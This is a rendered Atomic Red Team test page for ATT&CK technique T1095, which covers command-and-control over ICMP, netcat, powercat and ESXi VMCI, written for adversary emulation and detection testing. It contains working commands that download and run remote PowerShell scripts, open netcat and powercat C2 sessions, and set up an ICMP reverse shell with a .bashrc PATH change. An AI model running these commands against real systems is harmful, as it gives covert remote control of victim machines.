T1095 - Non-Application Layer Protocol

Description from ATT&CK (opens in a new tab)

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

In ESXi environments, adversaries may leverage the Virtual Machine Communication Interface (VMCI) for communication between guest virtual machines and the ESXi host. This traffic is similar to client-server communications on traditional network sockets but is localized to the physical machine running the ESXi host, meaning it does not traverse external networks (routers, switches). This results in communications that are invisible to external monitoring and standard networking tools like tcpdump, netstat, nmap, and Wireshark. By adding a VMCI backdoor to a compromised ESXi host, adversaries may persistently regain access from any guest VM to the compromised ESXi host’s backdoor, regardless of network segmentation or firewall rules in place.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)

Atomic Tests

• Atomic Test #1 - ICMP C2

• Atomic Test #2 - Netcat C2

• Atomic Test #3 - Powercat C2

• Atomic Test #4 - Linux ICMP Reverse Shell using icmp-cnc

Atomic Test #1 - ICMP C2

This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc

Inputs:

Attack Commands: Run with powershell!

IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}

Atomic Test #2 - Netcat C2

Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p

Supported Platforms: Windows

auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37

Inputs:

Attack Commands: Run with powershell!

cmd /c "#{ncat_exe}" #{server_ip} #{server_port}

Dependencies: Run with powershell!

Description: ncat.exe must be available at specified location (#{ncat_exe})

Check Prereq Commands:

if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}

Get Prereq Commands:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path "#{ncat_path}" | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
  Expand-Archive $zippath $parentpath -Force
  $unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}

Atomic Test #3 - Powercat C2

Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p

Supported Platforms: Windows

auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e

Inputs:

Attack Commands: Run with powershell!

IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}

Atomic Test #4 - Linux ICMP Reverse Shell using icmp-cnc

ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems. This method allows attackers to communicate and control compromised devices while remaining undetected.

For more details, check this blog: ICMP Reverse Shell Blog (opens in a new tab)

Important Notes:

• Use [icmp-cnc] for the C2 server (Attacker) and [icmpdoor] for the C2 client (Victim).
• Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor (opens in a new tab)].
• Root access is required.

Supported Platforms: Linux

auto_generated_guid: 8e139e1f-1f3a-4be7-901d-afae9738c064

Run it with these steps!

1. Run the following command on both the attacker and victim machines to download the required binaries.

   mkdir -p /tmp/icmpdoor && wget -P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc (opens in a new tab) https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor (opens in a new tab) && chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc

2. Start the C2 server on the attacker system to listen for incoming connections.

   icmp-cnc --interface --destination_ip

3. Run the client on the victim machine.

   icmpdoor --interface --destination_ip

4. Cleanup Command: Remove the icmpdoor directory.

   rm -rf /tmp/icmpdoor